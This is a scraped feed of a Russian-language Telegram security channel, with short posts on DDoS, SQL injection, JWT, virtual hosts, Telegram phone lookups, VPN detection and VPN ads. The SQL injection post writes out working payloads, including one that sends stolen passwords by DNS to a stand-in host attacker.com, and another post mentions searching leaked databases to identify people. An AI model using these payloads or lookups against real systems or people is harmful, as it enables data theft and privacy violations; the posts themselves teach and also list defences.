This media is not supported in your browser
VIEW IN TELEGRAM
DDoS — логичное продолжение DoS, но уже на другом уровне.
Если DoS — это один источник, то DDoS — это тысячи и миллионы узлов, которые одновременно давят цель, пока она не перестаёт отвечать.
Что важно знать:
🔴 DDoS (Distributed Denial of Service) — распределённая атака, при которой трафик идёт сразу с множества источников: ботнетов, заражённых серверов, IoT-устройств.
🔴 Запросы летят с тысяч IP из разных стран, сетей и ASN.🔴 В логах это выглядит как «нормальный» трафик, но в ненормальных объёмах.
🔴 Блокировка одного IP не решает ничего.🔴 Нужно фильтровать по поведению, протоколам, типам запросов, а иногда резать целые регионы и подсети.
🔴 volumetric — забивают канал (Gbps/Tbps);🔴 protocol — ломают стек (SYN, UDP, ICMP);🔴 application-layer — бьют по HTTP/API, имитируя живых пользователей.
🎯 онлайн-сервисы, банки, игры, маркетплейсы, госресурсы, API без rate-limit.
Короче говоря
Код может быть идеальным, но без защиты инфраструктура ляжет первой.
Tech Lab | Чат | #Виды атак
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
Все знают ' OR '1'='1, но SQLi — это целый спектр техник. Разберём эволюцию от классики до скрытых атак.
Работает, если данные из запроса выводятся на страницу (список пользователей, посты). Позволяет "дописать" свой запрос к оригинальному и увидеть результат.
' UNION SELECT username, password FROM users--
Суть: Крадём данные напрямую из интерфейса.
Приложение не показывает данные, но его поведение меняется. Атакующий задаёт вопросы "да/нет":
' AND (SELECT SUBSTRING(password,1,1) FROM users)='a'--
Если условие верно — страница загружается нормально, если нет — с ошибкой или пустая. Так посимвольно угадываем пароли.
Разновидность слепой, где ответ — это задержка.
' AND IF((SELECT password) LIKE 'a%', SLEEP(5), 0)--
Если первый символ пароля — a, сервер "заснёт" на 5 секунд. Долгий ответ = угадали.
Когда ничто не помогает, заставляем саму базу данных отправить нам данные. Через DNS-запрос.
sql
' UNION SELECT LOAD_FILE('\\\\'(SELECT password)'.attacker.com\\test')--
Как работает:
🔵 СУБД пытается прочитать "файл" по пути \\<украденный_пароль>.attacker.com\test.🔵 Для этого она делает DNS-запрос к домену attacker.com.🔵 В логах DNS-сервера злоумышленник видит полный запрос: <украденный_пароль>.attacker.com.🔵 Данные украдены.
🔵 UNION — если виден вывод.🔵 Blind — если есть косвенная реакция.🔵 DNS-атака — когда другие методы бессильны, но можно выполнить произвольный запрос.🔵 Защита — не только фильтрация кавычек, а параметризованные запросы, минимальные права БД и мониторинг DNS.
Tech Lab | Чат | #Основы
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7
Вокруг пробива по телефону в Telegram много мифов, но механика проста: мессенджер показывает совпадения из своей адресной книги и даёт боту доступ ровно к тому, что пользователь сам не закрыл в настройках.Поэтому часть «поиска» — это не магия, а правильно собранные источники.
Сегодня такие инструменты комбинируют несколько вещей:
📌 проверку номера через ботов-агрегаторов;📌 сопоставление по аватару, username и следам в открытых чатах;📌 поиск по слитым базам и OSINT-каталогам.
Если настройки приватности слабые — о тебе можно узнать больше, чем ты думаешь.
Tech Lab | Чат | #Cтатьи
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10
Когда вы входите в приложение, вам часто выдают не обычную куку, а JSON Web Token (JWT) — компактный и самодостаточный токен, который содержит всю информацию о сессии прямо внутри себя.
JWT создан для статусlessness — серверу не нужно хранить сессию в памяти. Он просто проверяет подпись токена и верит данным внутри. Токен состоит из трёх частей, разделённых точками:
Header.Payload.Signature🔵 Header (Заголовок): Обычно {"alg": "HS256", "typ": "JWT"}. Указывает алгоритм подписи (HS256, RS256, none) и тип.🔵 Payload (Полезная нагрузка): JSON-объект с утверждениями (claims). Например: {"sub": "user123", "name": "Vasya", "admin": false, "iat": 1516239022}.🔵 Signature (Подпись): Криптографическая подпись, которая гарантирует, что токен не был изменён. Создаётся путём хеширования base64UrlEncode(header) + "." + base64UrlEncode(payload) с использованием секретного ключа (для HS256) или приватного ключа (для RS256).
Пример токена:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c🔵 Никогда не доверяйте alg из токена. Жёстко задавайте алгоритм проверки на сервере.🔵 Всегда проверяйте подпись перед чтением payload.🔵 Используйте сложные, случайные секретные ключи для HS256.🔵 Проверяйте все claims в payload: iss (issuer), aud (audience), exp (expiration time). Не используйте none в продакшене.🔵 Храните приватные ключи в безопасности, публичные ключи — в доверенных источниках.🔵 Валидируйте параметр kid, запрещая пути и URL.
Tech Lab | Чат | #Основы
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8
Представьте одно здание с разными входами. Так работает веб-сервер с виртуальными хостами: на одном IP и порту живут несколько независимых сайтов. Ваш blog.com и shop.com могут физически быть на одной машине.
🟢 По имени (самый частый) — сервер смотрит на заголовок Host: в запросе и отдаёт нужный сайт.🟢 По IP-адресу — у каждого виртуального хоста свой уникальный IP на одном сервере.🟢 По порту — например, site.com:8080 и site.com:9000 (неудобно для пользователей).
В корпоративных сетях часто используют внутренние DNS-имена, которых нет в публичном интернете:
⚫️ files.corp — файловое хранилище⚫️ wiki.internal — база знаний⚫️ monitor.local — панель мониторинга
Эти ресурсы доступны только изнутри сети. Пользователи даже не задумываются, что обращаются к виртуальным хостам.
В следующем посте разберём практический пример с командной строкой.
Tech Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8
Продолжаем рубрику #OSINT
Напоминаем:
➡️ Ваша задача — найти это место. Город, улицу, точку съемки. Максимально точно.
⚫️Выкладывается фото
⚫️До следующего дня вы ищете место.
⚫️Пишете ответ в комментарии (первый правильный — молодец).
Готовьте глаза, карты и гугл. Будет жарко
Ваше задание
Наш ВПН
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3❤🔥1🆒1
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍1
This media is not supported in your browser
VIEW IN TELEGRAM
На чем будет ездить админ если вы купите впн, давайте поможем админу осуществить мечту ! 🔥
😁11❤4🔥2
Статья разбирает методы детекции, которые работают прямо сейчас. Если ваш VLESS+Reality сервер лёг в последние месяцы — вы не один. В сообществах фиксируют волны блокировок, которые раньше не достигали хорошо настроенных Reality-серверов.
Как ТСПУ видят VLESS:
🔵 JA3/JA4-отпечатки — TLS-рукопожатие имеет уникальные характеристики, которые можно детектировать🔵 Поведенческий анализ — даже при шифровании, паттерны трафика (размер пакетов, тайминги) могут выдать прокси🔵 Сертификаты — даже если они "поддельные", методы анализа становятся умнее
XHTTP — что это:
⚪️ Новая транспортная обёртка, маскирующая прокси-трафик под обычный HTTP/3⚪️ Использует QUIC, который сложнее анализировать⚪️ Разработан для противодействия именно поведенческому анализу
VPN за 1₽ | Tech Lab | Чат | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
🔴 Стабильный работа Telegram, Discord и других соц сетей;🔴 Быстрый YouTube в высоком качестве;🔴 ChatGPT, Claude и другие зарубежные AI;🔴 Работа мобильного интернета при локдаунах.
🔴 3 дня бесплатно;🔴 До 5 устройств;🔴 Безлимитный трафик;🔴 149 ₽/месяц — и все основные устройства подключены
ПОДКЛЮЧИТЬСЯ
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Commando VM: Windows для хакеров
— Она превращает стандартную среду Windows в полноценную среду для тестирования безопасности
• Читать статью
VPN за 1₽ | Tech Lab | Чат
Commando VM (Complete Mandiant Offensive VM) — это специализированная виртуальная машина на базе Windows, созданная для пентестинга, работы Red Team и аудита защищённости корпоративных сетей
— Она превращает стандартную среду Windows в полноценную среду для тестирования безопасности
• Читать статью
VPN за 1₽ | Tech Lab | Чат
❤1
Он подключил их к боту, который отправляет сообщения пользователей в ChatGPT и возвращает ответы прямо в мессенджер. Теперь через него можно бесплатно общаться с ChatGPT-6 Astra.
Please open Telegram to view this post
VIEW IN TELEGRAM
💊3👍1😁1😨1